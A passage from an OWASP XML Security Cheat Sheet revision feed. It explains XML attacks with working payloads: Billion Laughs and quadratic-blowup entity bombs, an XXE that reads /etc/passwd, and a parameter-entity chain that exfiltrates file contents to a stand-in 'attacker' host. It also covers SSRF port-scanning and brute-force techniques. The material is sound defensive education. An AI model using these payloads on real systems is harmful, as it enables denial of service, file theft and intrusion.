  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available on the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read files from the server. This type of schema only serves as a suggestion for sending a document, but it must contain a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
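A deployment script could flag schema files that any user can modify. The following Python sketch assumes POSIX-style permissions; the function name &amp;lt;tt&amp;gt;is_world_writable&amp;lt;/tt&amp;gt; and the temporary stand-in for &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; are hypothetical and only serve the illustration:&lt;br /&gt;

```python
import os
import stat
import tempfile


def is_world_writable(path):
    """Return True when the 'other' permission class has write access."""
    mode = os.stat(path).st_mode
    # stat.filemode() renders the mode like `ls -l`, e.g. "-rw-rw-rw-";
    # index 8 is the write flag for other users.
    return stat.filemode(mode)[8] == "w"


# Demonstration on a temporary stand-in for note.dtd (POSIX permissions assumed).
with tempfile.TemporaryDirectory() as directory:
    schema_path = os.path.join(directory, "note.dtd")
    with open(schema_path, "w") as handle:
        handle.write("placeholder")
    os.chmod(schema_path, 0o666)
    loose = is_world_writable(schema_path)
    os.chmod(schema_path, 0o644)
    strict = is_world_writable(schema_path)

print(loose, strict)  # True False
```

A check like this only reports the problem; the file mode still has to be tightened by whoever owns the schema.&lt;br /&gt;
&lt;br /&gt;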
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker could sniff and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted over unencrypted HTTP. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, example.com resolves to the IP address 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may actually be retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
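The arithmetic behind the quadratic blowup can be checked with a few lines of Python. This is a rough sketch: the helper names are hypothetical, and the size of the document sent counts only the entity value plus one three-character reference per occurrence, ignoring the surrounding markup:&lt;br /&gt;

```python
def expanded_size(entity_length, reference_count):
    """Characters produced when one entity is referenced many times."""
    return entity_length * reference_count


def document_size(entity_length, reference_count, reference_length=3):
    """Approximate characters sent: the entity value plus all references."""
    return entity_length + reference_count * reference_length


ENTITY_LENGTH = 100_000    # length of the entity value in the example
REFERENCE_COUNT = 100_000  # number of references in the document body

expanded = expanded_size(ENTITY_LENGTH, REFERENCE_COUNT)
sent = document_size(ENTITY_LENGTH, REFERENCE_COUNT)
print(expanded)          # 10000000000
print(sent)              # 400000
print(expanded // sent)  # 25000
```

Under these assumptions, a document of roughly 400,000 characters expands to 10^10 characters once every reference is resolved.&lt;br /&gt;
&lt;br /&gt;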
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as 10 references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; each of these will then be resolved as 10 references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. Finally, the CPU and/or memory will be affected by expanding the 10^9 (1,000,000,000) resulting references to &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, which amount to 3*10^9 (3,000,000,000) characters and could make the parser crash.&lt;br /&gt;
&lt;br /&gt;
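The growth of the nested entities can be reproduced with a short calculation. The following Python sketch uses hypothetical helper names; the fan-out of 10 and the nine levels are taken from the DTD above:&lt;br /&gt;

```python
def expansion_count(fanout, levels):
    """Number of base-entity copies after `levels` rounds of nesting."""
    return fanout ** levels


def expanded_characters(base_text, fanout, levels):
    """Total characters once the outermost entity is fully expanded."""
    return len(base_text) * expansion_count(fanout, levels)


# LOL1 to LOL9 each reference the previous entity 10 times.
copies = expansion_count(10, 9)
characters = expanded_characters("LOL", 10, 9)
print(copies)      # 1000000000
print(characters)  # 3000000000
```

Each additional nesting level multiplies the result by the fan-out, which is why a document of a few hundred bytes is enough.&lt;br /&gt;
&lt;br /&gt;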
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; whose value is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;; the entity is expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes the server retrieve remote resources, for example a file over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, or to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information returned by a port scan will depend on the implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario: with complete disclosure, you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to a valid port will be very quick (one second, for example). The difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, and then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
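The averaging step described for the time-based case can be sketched in Python. Everything here is an assumption made for illustration: the measurements are made-up values collected beforehand, the threshold is arbitrary, and whether a slow response means an open or a closed port depends on the implementation being tested, so the sketch only labels ports as slow or fast:&lt;br /&gt;

```python
from statistics import mean


def classify_by_latency(samples, threshold_seconds):
    """Label each port "slow" or "fast" by its average response time.

    `samples` maps a port number to a list of response times in seconds.
    """
    labels = {}
    for port, timings in samples.items():
        labels[port] = "slow" if mean(timings) > threshold_seconds else "fast"
    return labels


# Hypothetical measurements, several per port, collected beforehand.
measurements = {
    22: [0.051, 0.049, 0.055, 0.050],
    80: [0.048, 0.052, 0.047, 0.051],
    8080: [0.212, 0.198, 0.230, 0.205],
}
print(classify_by_latency(measurements, threshold_seconds=0.1))
# {22: 'fast', 80: 'fast', 8080: 'slow'}
```

Taking more samples per port makes the averages less sensitive to network jitter, which is the reason the approach degrades on higher latency networks.&lt;br /&gt;
&lt;br /&gt;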
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; in the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224430</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224430"/>
				<updated>2016-12-21T20:18:16Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
